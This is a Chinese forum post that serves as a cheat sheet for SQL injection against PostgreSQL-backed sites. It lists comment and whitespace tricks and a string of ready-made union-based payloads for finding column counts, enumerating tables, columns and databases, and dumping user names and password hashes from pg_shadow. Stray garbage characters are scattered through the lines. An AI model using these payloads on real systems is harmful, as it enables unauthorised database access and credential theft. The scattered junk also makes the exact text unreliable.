找回密码
 立即注册
查看: 2315|回复: 0
打印 上一主题 下一主题

postgreSQL注入总结

[复制链接]
抢楼 抢楼 本帖为抢楼帖,欢迎抢楼! 
跳转到指定楼层
楼主
发表于 2013-10-13 12:57:16 | 只看该作者 回帖奖励 |阅读模式
结合了MSSQL MySQL Oracle的一些特点( K  ?) {+ a; ?3 S

支持多语句执行,语句可以没有from

postgres用户是超级用户(创始人账户) 只有superuser有copy权限

注释: — , /**/
$ @% H4 O8 v) R2 |+ D! C3 B' f2 q7 j连接符: %20 , + , /**/

内置函数:, ]# e# N9 d& J/ a
current_database() //当前数据库名- W9 h1 ]$ o) ]1 A9 X  j% h
session_user //会话用户
8 _5 k4 K3 K0 ]6 t8 d: K5 H8 Y4 ]0 g& V; Zcurrent_user //当前数据库用户
% a, ?3 I" k- x2 h/ kuser //当前用户0 c, h% G- v6 d% l6 ]& P! ]
version() //数据库版本

Union注射:* U8 ?8 B- m; P0 P5 V
order by n–) _$ N# v: f" p/ M3 F
and 1=2 union select null,null,null–" v. V0 W! M( F5 k$ y; C, A
and 1=2 union select ‘beach’,null,null–
) q/ c, _7 q& dand 1=2 union select (select version()),null,null–

获取表名,字段名(新版本利用information_schema):
: D' o: |+ [, S# F$ \4 t& e! R! Ygroup_concat(table_name)' T" ^2 \6 z$ ?+ h, Z
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–( G8 g6 {' p0 |7 T
and 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–; y, i" q0 \7 S& J1 g$ b
(老版本)$ y4 S& u: D0 ~$ l
pg_class.oid对应pg_attribute.attrelid/ T' [* M' Q8 K: k7 R
pg_class.relname表名
6 ]# w$ `0 p3 N: xpg_attribute.attname字段名

select relname from pg_class获取表名
3 _/ B; z; S- p& x# {5 A2 a6 Uselect oid from pg_class where 条件 获取参数
" R! ]) e( Z7 t' r9 _2 z8 j8 Vselect attname from pg_attribute where attrelid=’oid的值’ 获取字段名

实战:
0 L9 R, h8 _8 A9 S9 hand 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表) G: h5 A% e8 h0 h. m; S% }
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–
7 N0 Q5 p+ K, k由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136

and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名
3 y& m  {) L2 `2 Q! f======================================================================% J0 N4 _4 u( E/ P9 o
and 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库
. r& w6 @; S0 k& n3 Yand 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表